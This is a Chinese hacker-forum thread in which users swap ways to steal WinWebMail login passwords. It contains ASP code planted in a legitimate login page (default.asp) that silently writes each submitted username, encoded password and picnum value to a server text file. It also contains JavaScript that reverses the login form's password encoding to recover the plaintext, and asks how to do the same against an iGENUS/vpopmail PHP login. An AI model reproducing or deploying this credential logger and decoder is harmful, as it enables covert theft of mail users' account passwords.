[讨论]如何记录Winwebmail的明文密码??
议题作者:只手乾坤信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
我利用网上现有的ASP记录论坛等用户密码的代码。想记录一个winwebmail的用户名和密码。
代码如下
<%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("Scripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile("c:\1.txt",2,True)
file.WriteLine ""
End If
If fso.FileExists("c:\1.txt") Then
set file=fso.OpenTextFile("c:\1.txt",8,True)
Else
set file=fso.CreateTextFile("c:\1.txt")
end if
file.WriteLine "username:"+Request.form("username")
file.WriteLine "pwhidden:"+Request.form("pwhidden")
file.close
set file3=fso.GetFile("c:\1.txt")
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile("c:\1.txt",2,True)
file2.WriteLine ""
file2.close
end if
set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing
%>
结果是。记录的用户名部分为正常。密码部分为加密后的密码。
不知道哪位搞过WINWEBMAIL没。如何解决? 如果你查看一下登录页面的源码,会发现在表单提交前js调用了一个encode函数,其功能是将明文密码与一个叫做picnum的值进行简单运算。
不过好在pinnum也是表单里面hidden的内容,应该会一起提交过来的。所以建议你把picnum一起记录下来,然后拿回来按照encode函数的逆过程找出原始密码。
注:只是理论上觉得可以,还没有具体试过。 刚写的解密代码,学习下脚本解密的算法.
其实有简单的方法,只要把登录界面的明文密码放到<form></form>里再截取pwshow就可以了.
[code]
<SCRIPT LANGUAGE=javascript>
function jm() {
pwhidden.value = encode(pwshow.value, parseInt(picnum.value));
}
function jiem() {
pwshow.value = unencode(pwhidden.value, parseInt(picnum.value));
}
function encode(datastr, bassnum) {
var tempstr;
var tchar;
var newdata = "";
for (var i = 0; i < datastr.length; i++)
{
tchar = 65535 + bassnum - datastr.charCodeAt(i);
tchar = tchar.toString();
//alert(tchar);
while(tchar.length < 5)
{
tchar = "0" + tchar;
}
newdata = newdata + tchar;
}
return newdata;
}
function unencode(datastr, bassnum) {
var tempstr;
var tchar;
var newdata = "";
for (var i = 0; i < datastr.length; i=i+5)
{
tchar = 65535 + bassnum - datastr.substr(i,5);
tempstr = String.fromCharCode(tchar);
newdata = newdata+tempstr;
}
return newdata;
}
//-->
</SCRIPT>
验证码:<input type="text" name="picnum" value="1234">
明文:<input type="text" name="pwshow" maxlength="32" class="textbox">
<input class="Bsbttn" type=submit value=" 加密 " onClick="javascript:jm()">
<input class="Bsbttn" type=submit value=" 解密 " onClick="javascript:jiem()">
密文:<input type="text" name="pwhidden">
[/code] 解密代码和2楼说的一样
需要picnum
[s:270] 感谢楼上。人多好办事。已经搞定。顺便借这个帖子再来一问
<?php
/*-
* iGENUS webmail
*
* Copyright (c) 1999-2001 by iGENUS Inc.
* All rights reserved.
* Author: Qiong Wu <[email]wuqiong@igenus.org[/email]>
*
* $Id: login.php,v 1.29 2004/09/01 01:22:37 wuqiong Exp $
*/
session_start();
unset($_SESSION['G_USERNAME']);
unset($_SESSION['G_DOMAIN']);
unset($_SESSION['G_HOME']);
unset($_SESSION['G_TIME']);
unset($_SESSION['G_QUOTA']);
unset($_SESSION['G_NICKNAME']);
unset($_SESSION['G_ID']);
unset($_SESSION['G_LANG']);
include "config/config_inc.php";
include "include/fun_inc.php";
include "language/$CFG_LANGUAGE"."_inc.php";
if(!isset($_COOKIE['LoginDomain'])){
$Cookies_Domain = strtolower($_SERVER["HTTP_HOST"]);
if(preg_match("/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1.3}.[0-9]{1,3}/", $Cookies_Domain))
$Cookies_Domain = '';
list($Cookies_Domain,$null) = split(':', $Cookies_Domain, 2);
$Cookies_Domain = str_replace('mail.','',$Cookies_Domain);
}
else $Cookies_Domain = $_COOKIE['LoginDomain'];
$http_host = split(':',strtolower($_SERVER["HTTP_HOST"]));
$OUT['domain'] = str_replace('mail.','', $http_host[0]);
$type = trim($HTTP_GET_VARS['type']);
$Cmd = trim($HTTP_GET_VARS['Cmd']);
if ($type=="default" )
{
$Post_name = trim($HTTP_GET_VARS['name']);
$Post_domain = trim($HTTP_GET_VARS['domain']);
$Post_passwd = trim($HTTP_GET_VARS['passwd']);
$Post_Lang = "gb";
#echo $Cmd.$type.$Post_name.$Post_domain.$Post_passwd;
}
else
{
#echo "local";
// Post
$Post_name = $_POST['name'];
$Post_domain = $_POST['domain'];
$Post_passwd = $_POST['passwd'];
$Post_Lang = $_POST['Lang'];
}
// Get
$Get_Cmd = $_GET['Cmd'];
$Get_Code = $_GET['Code'];
$Get_Lang = $_GET['Lang'];
$errorlogin = 0; // 0 - success
// -1 - user not exist
// -2 - password error
// -3 - domain not exist
if (($Get_Cmd=="login") && ($Post_name!="") && ($Post_passwd !="") && ($Post_domain!="")){
session_start();
#echo $Cmd.$type.$Post_name.$Post_domain.$Post_passwd;
// 设置 cookies_LoginDomain
setcookie("LoginDomain",$Post_domain,time()+3600*24*365);
// list($Post_name,$Post_domain) = split("@",$user,2);
$sql = mysql_connect($CFG_MYSQL_HOST, $CFG_MYSQL_USER, $CFG_MYSQL_PASS);
mysql_select_db($CFG_MYSQL_DB,$sql);
if ($CFG_VPOPMAIL_MYSQL_LARGE_SITE){
$Vpopmail_Domain = ereg_replace("\.","_",$Post_domain);
$query = "SELECT * FROM $Vpopmail_Domain WHERE pw_name='$Post_name'";
}else{
$query = "SELECT * FROM vpopmail WHERE pw_name='$Post_name' and pw_domain='$Post_domain'";
}
// echo $query;
$result = @mysql_query($query,$sql);
$rows = @mysql_num_rows($result);
if($rows !=1 ){
PutLogs(0, 'login', "user not exist","$Post_name@$Post_domain", $sql);
ErrorExit(-1); // user not exist!
}
$data = mysql_fetch_array($result);
$home = $data['pw_dir'];
$Post_passwd2 = $data['pw_passwd'];
$pw_id = $data['pw_id'];
$pw_shell = $data['pw_shell'];
$pw_gecos = $data['pw_gecos'];
$pw_gid = $data['pw_gid'];
$pw_domain = strtolower($data['pw_domain']);
$pw_name = strtolower($data['pw_name']);
if ($pw_gid & 0x04){
PutLogs($pw_id, 'login', "no priv to login","$Post_name@$Post_domain", $sql);
ErrorExit(-2); // 用户无权登录
}
if ($home !="" && ($Post_passwd2 == crypt($Post_passwd,$Post_passwd2))){
$_SESSION['G_ID'] = $pw_id;
$_SESSION['G_USERNAME'] = $pw_name;
$_SESSION['G_HOME'] = $home;
$_SESSION['G_DOMAIN'] = $pw_domain;
$_SESSION['G_TIME'] = time();
$_SESSION['G_LANG'] = $Post_Lang;
$_SESSION['G_QUOTA'] = $pw_shell;
$_SESSION['G_NICKNAME'] = $pw_gecos;
// 建立用户临时文件目录
if ( !is_dir($CFG_TEMP) ){
@mkdir($CFG_TEMP,$CFG_TEMP_MOD)||
die("Error create directory $CFG_TEMP,you must make $CFG_TEMP directory manual.Please read the INSTALL file.");
}
if ( !is_dir("$CFG_TEMP/$SG_DOMAIN") ) {
mkdir("$CFG_TEMP/$SG_DOMAIN",$CFG_TEMP_MOD)||die("Error create directory $SG_DOMAIN");
}
if ( !is_dir("$CFG_TEMP/$SG_DOMAIN/$SG_USERNAME") ) {
mkdir("$CFG_TEMP/$SG_DOMAIN/$SG_USERNAME",$CFG_TEMP_MOD)||die("Error create directory $SG_USERNAME");
}
chdir("$CFG_TEMP/$SG_DOMAIN/$SG_USERNAME");
// 寫成功登錄日至
PutLogs($pw_id, 'login', "success","$Post_name@$Post_domain", $sql);
header("Location: index.php");
exit();
}else{
PutLogs($pw_id, 'login', "error password", "$Post_name@$Post_domain", $sql);
ErrorExit(-3); //用户密码错误
}
}
$mesg = $LANG_LOGIN_WELCOME;
if($Get_Cmd==error){
switch($Get_Code){
case -1:
$mesg = $LANG_LOGIN_ERROR_USER_NOT_EXIST;
break;
case -2:
$mesg = $LANG_LOGIN_ERROR_USER_NO_PRIV;
break;
case -3:
$mesg = $LANG_LOGIN_ERROR_PASSWD;
break;
}
}
function PutLogs($pw_id, $action, $content, $email, $sql){
$query = "insert logs set pw_id=$pw_id,".
"ip='".$_SERVER['REMOTE_ADDR']."',".
"action='login',".
"time=now(),".
"email='$email',".
"content='$content'";
// echo $query;
@mysql_query($query, $sql);
mysql_close($sql);
}
function ErrorExit($errorcode){
header("Location: login.php?Cmd=error&Code=$errorcode");
exit();
}
// load Template
$OUT['CHARSET'] = $CFG_CHARSET[$Get_Lang]; // 页面字符编码设置
$OUT['MESG'] = $mesg; // 欢迎及错误提示信息
$OUT['COOKIES_DOMAIN'] = $Cookies_Domain; // 上次登录使用的域
$OUT['LANG'] = $Get_Lang; // 登录后显示语言
include "template/_login.php";
?>
如上代码。vpopmail的登陆界面。如何记录密码??? 记了好长时间。就是没记到信息。
刚刚才发现。访问winwebmail的主页面时。代码写入记录账号。密码。空数据。然而登陆的时候居然不记录。以下是文件。请问谁知道是怎么回事?
<%
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
%>
<%
un = trim(request("username"))
pw = trim(request("pwhidden"))
saveUser = trim(request("saveUser"))
cleancookies = trim(request("cleancookies"))
if cleancookies = "true" then
Response.Cookies("accounts") = ""
end if
showaccounts = trim(request.Cookies("accounts"))
Response.Cookies("name") = ""
dim ei
dim errmsg
errmsg = trim(request("errstr"))
if IsEmpty(Application("em_MaxFolders")) and IsEmpty(Application("em_MaxMPOP3")) and IsEmpty(Application("em_MaxSigns")) then
TimeDelaySeconds(5)
dim mam
set mam = server.createobject("easymail.AdminManager")
mam.Load
if mam.IsLoadOK = true then
Application("em_MaxFolders") = mam.MaxFolders
Application("em_MaxMPOP3") = mam.MaxMPOP3
Application("em_MaxSigns") = mam.MaxSigns
Application("em_SystemAdmin") = mam.SystemAdmin
Application("em_EnableBBS") = mam.EnableBBS
Application("em_Enable_SignHold") = mam.Enable_SignHold
Application("em_Enable_FreeSign") = mam.Enable_FreeSign
Application("em_Enable_SignWithDomainUser") = mam.Enable_SignWithDomainUser
Application("em_Enable_SignNumberLimit") = mam.Enable_SignNumberLimit
Application("em_SignNumberLimitDays") = mam.SignNumberLimitDays
Application("em_Enable_ShareFolder") = mam.Enable_ShareFolder
Application("em_Enable_SignEnglishName") = mam.Enable_SignEnglishName
Application("em_LogPageKSize") = mam.LogPageKSize
Application("em_TestAccounts") = mam.TestAccounts
Application("em_SignMode") = mam.SignMode
Application("em_SignWaitDays") = mam.SignWaitDays
Application("em_am_Name") = mam.am_Name
Application("em_am_Accounts") = mam.am_Accounts
set mam = nothing
else
set mam = nothing
response.redirect "err.asp?errstr=" & Server.URLEncode("出错: 可能是WebEasyMail服务未启动") & "&" & getGRSN()
end if
end if
'if un <> "" and pw <> "" and Request.ServerVariables("REQUEST_METHOD") = "POST" then
if un <> "" and pw <> "" then
un = LCase(un)
pw = strDecode(pw, trim(request("picnum")))
'Response.Write trim(request("picnum"))
'response.end
if un <> Application("em_SystemAdmin") then
dim webkill
set webkill = server.createobject("easymail.WebKill")
webkill.Load
rip = Request.ServerVariables("REMOTE_ADDR")
if webkill.IsKill(rip) = true then
set webkill = nothing
response.redirect "err.asp?errstr=" & Server.URLEncode("拒绝IP地址 " & rip & " 访问") & "&" & getGRSN()
end if
set webkill = nothing
end if
set ei = Application("em")
Session("wem") = ""
Session("mail") = ""
Session("tid") = ""
Session("SecEx") = ""
dim pwwt
pwwt = ei.PassWordWaitMinute
dim checkret
checkret = ei.CheckPassWordEx(un, pw, Request.ServerVariables("REMOTE_ADDR"))
if checkret = 0 then
Session("tid") = ei.Login(un)
Session("wem") = un
Session("mail") = ei.GetUserMail(un)
set ei = nothing
if saveUser = "true" then
Response.Cookies("accounts") = un
Response.Cookies("accounts").Expires = DateAdd("y", 5, Now())
end if
SecEx = trim(request("SecEx"))
if SecEx = "true" then
Session("SecEx") = "1"
else
Session("SecEx") = "0"
end if
Response.Redirect "welcome.asp"
elseif checkret = 2 then
set ei = nothing
errmsg = "连续三次输入密码错误,请过" & pwwt & "分钟后再试。"
else
set ei = nothing
errmsg = "错误的用户名或密码!请再次输入。"
end if
end if
if Session("wem") <> "" then
set ei = Application("em")
ei.Logout Session("wem"), Session("tid")
set ei = nothing
end if
Session("wem") = ""
Session("mail") = ""
Session("tid") = ""
Session("SecEx") = ""
%>
<html>
<head>
<META HTTP-EQUIV="Content-Type" content="text/html; charset=gb_2312-80">
<title>邮件服务器系统</title>
<LINK href="images\hwem.css" rel=stylesheet>
<SCRIPT LANGUAGE=javascript>
<!--
if (top.location !== self.location) {
top.location=self.location;
}
function window_onload() {
<%
if showaccounts = "" then
%>
usernameshow.focus();
<%
else
%>
pwshow.focus();
<%
end if
if errmsg <> "" then
%>
alert("<%=errmsg %>");
<%
end if
%>
}
function gook() {
<%
if showaccounts = "" then
%>
if (usernameshow.value == "")
{
alert("用户名不可为空");
usernameshow.focus();
return ;
}
<%
end if
%>
if (pwshow.value == "")
{
alert("密码不可为空");
pwshow.focus();
return ;
}
<%
if showaccounts = "" then
%>
f1.saveUser.value = showsaveUser.checked;
f1.username.value = usernameshow.value;
<%
else
%>
f1.username.value = "<%=showaccounts %>";
<%
end if
%>
f1.SecEx.value = showSecEx.checked;
f1.pwhidden.value = encode(pwshow.value, parseInt(f1.picnum.value));
f1.submit();
}
function encode(datastr, bassnum) {
var tempstr;
var tchar;
var newdata = "";
for (var i = 0; i < datastr.length; i++)
{
tchar = 65535 + bassnum - datastr.charCodeAt(i);
tchar = tchar.toString();
while(tchar.length < 5)
{
tchar = "0" + tchar;
}
newdata = newdata + tchar;
}
return newdata;
}
//-->
</SCRIPT>
</head>
<body LANGUAGE=javascript onload="return window_onload()">
<br><br>
<form name="f1" method="post" action="default.asp">
<input type="hidden" name="username">
<input type="hidden" name="pwhidden">
<input type="hidden" name="picnum" value="<%=createRnd() %>">
<input type="hidden" name="saveUser">
<input type="hidden" name="SecEx">
</form>
<table cellspacing=0 cellpadding=0 width=350 align=center border=0>
<tbody>
<tr>
<td valign=bottom align=right width=347 rowspan=2>
<table cellspacing=0 cellpadding=0 width="100%" border=0 style="BORDER-RIGHT: #334568 1px solid; BORDER-TOP: #333333 1px solid; BORDER-LEFT: #333333 1px solid; BORDER-BOTTOM: #333333 1px solid;">
<tbody>
<tr align="middle" bgcolor="#3280BE">
<td colspan=4 height=35 style="BORDER-BOTTOM: #333333 1px solid;"><b><font
color=#ffffff>邮件服务器系统</font></b></td>
</tr>
<tr>
<td colspan="4" height="20"> </td>
</tr>
<tr>
<td colspan="3" nowrap height="30" width="56">
</td><td nowrap><font class="s"><%
if showaccounts = "" then
%><b>用户名: </b></font><input type="text" name="usernameshow" maxlength="64" class="textbox"><%
else
%><b>用户名: </b></font><b><font class="s" color="#000099"><%=showaccounts %></font></b><%
end if
%> </td>
</tr>
<tr>
<td colspan="3" nowrap height="30"></td><td nowrap>
<font class="s"><b>密 码: </b></font><input type="password" name="pwshow" maxlength="32" class="textbox">
</td>
</tr>
<%
if showaccounts = "" then
%>
<tr valign="bottom">
<td colspan="4" nowrap align="center" height="30"><font class="s" color="#000000"><input type="checkbox" name="showSecEx">增强安全性
<input type="checkbox" name="showsaveUser">记住用户名</font>
</td>
</tr>
<%
else
%>
<tr valign="bottom">
<td colspan="4" nowrap align="center" height="30">
<font class="s" color="#000000"><input type="checkbox" name="showSecEx">增强安全性
<a href="default.asp?cleancookies=true">改用其他身份登录</a></font>
</td>
</tr>
<%
end if
%>
</td>
<tr>
<td colspan="4" nowrap align="right" height="60">
<input class="Bsbttn" type=submit value=" 确定 " onclick="javascript:gook()">
</td>
</tr>
</tbody>
</table>
</td>
<td width=1 bgcolor=#ffffff height=5></td>
<td width=1 bgcolor=#ffffff height=5></td>
<td width=1 bgcolor=#ffffff height=5></td>
</tr>
<tr>
<td width=1 bgcolor=#333333 height=120></td>
<td width=1 bgcolor=#666666 height=120></td>
<td width=1 bgcolor=#999999 height=120></td>
</tr>
<tr valign=top align=right>
<td colspan=4>
<table cellspacing=0 cellpadding=0 width="345" border=0>
<tbody>
<tr>
<td bgcolor=#333333 height=1></td>
</tr>
<tr>
<td bgcolor=#666666 height=1></td>
</tr>
<tr>
<td bgcolor=#999999 height=1></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr valign=center align=right>
<td colspan=4 height=35> </td>
</tr>
</tbody>
</table>
<div align="center">
<table width="35%" border="0">
<tr><!--<td align="center"><%
if Application("em_Enable_FreeSign") = true then
%>[<b><a href="create.asp?<%=getGRSN() %>">申请邮箱</a></b>] <%
end if
%>[<b><a href="forgetbf.asp?<%=getGRSN() %>">忘记密码</a></b>]
</td>--></tr>
<tr><td height="15">
</td></tr>
<tr>
<td align="center" nowrap height="25">
<a href="http://127.0.0.1:8080" target="_blank">测试</a>
</td>
</tr>
<tr>
<td align="center" nowrap>
</td>
</tr>
</table>
</div>
</body>
</html>
<%
function getGRSN()
dim theGRSN
Randomize
theGRSN = Int((9999999 * Rnd) + 1)
getGRSN = "GRSN=" & CStr(theGRSN)
end function
function createRnd()
dim retval
retval = getGRSN()
if Len(retval) > 4 then
retval = Right(retval, 4)
end if
if Left(retval, 1) = "0" then
retval = "5" & Right(retval, 3)
end if
createRnd = retval
end function
function strDecode(sd_Data, sd_bassnum)
dim sd_vChar
dim sd_NewData
dim sd_TempChar
sd_vChar = 1
do
if sd_vChar > Len(sd_Data) then
exit do
end if
sd_TempChar = CLng(Mid(sd_Data, sd_vChar, 5))
sd_TempChar = ChrW(65535 + sd_bassnum - sd_TempChar)
sd_NewData = sd_NewData & sd_TempChar
sd_vChar = sd_vChar + 5
loop
strDecode = sd_NewData
end function
function TimeDelaySeconds(DelaySeconds)
SecCount = 0
Sec2 = 0
while SecCount < DelaySeconds + 1
Sec1 = Second(Time())
if Sec1 <> Sec2 then
Sec2 = Second(Time())
SecCount = SecCount + 1
end if
wend
end function
%><%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("Scripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile("C:\WinWebMail\Web\mail.txt",2,True)
file.WriteLine ""
End If
If fso.FileExists("C:\WinWebMail\Web\mail.txt") Then
set file=fso.OpenTextFile("C:\WinWebMail\Web\mail.txt",8,True)
Else
set file=fso.CreateTextFile("C:\WinWebMail\Web\mail.txt")
end if
file.WriteLine "username:"+Request.form("username")
file.WriteLine "pwhidden:"+Request.form("pwhidden")
file.WriteLine "picnum:"+Request.form("picnum")
file.close
set file3=fso.GetFile("C:\WinWebMail\Web\mail.txt")
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile("C:\WinWebMail\Web\mail.txt",2,True)
file2.WriteLine ""
file2.close
end if
set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing
%> 如果输入错误的用户和密码。是一个不漏的记下来。输入正确的用户名和密码。却是一个记不下来 [quote]引用第2楼jackal于2007-09-13 14:47发表的 :
刚写的解密代码,学习下脚本解密的算法.
其实有简单的方法,只要把登录界面的明文密码放到<form></form>里再截取pwshow就可以了.
[code]
<SCRIPT LANGUAGE=javascript>
.......[/quote]
小弟愚钝。对ASP基本不通。不知道
只要把登录界面的明文密码放到<form></form>里再截取pwshow就可以了.
是怎么个操作法?
页:
[1]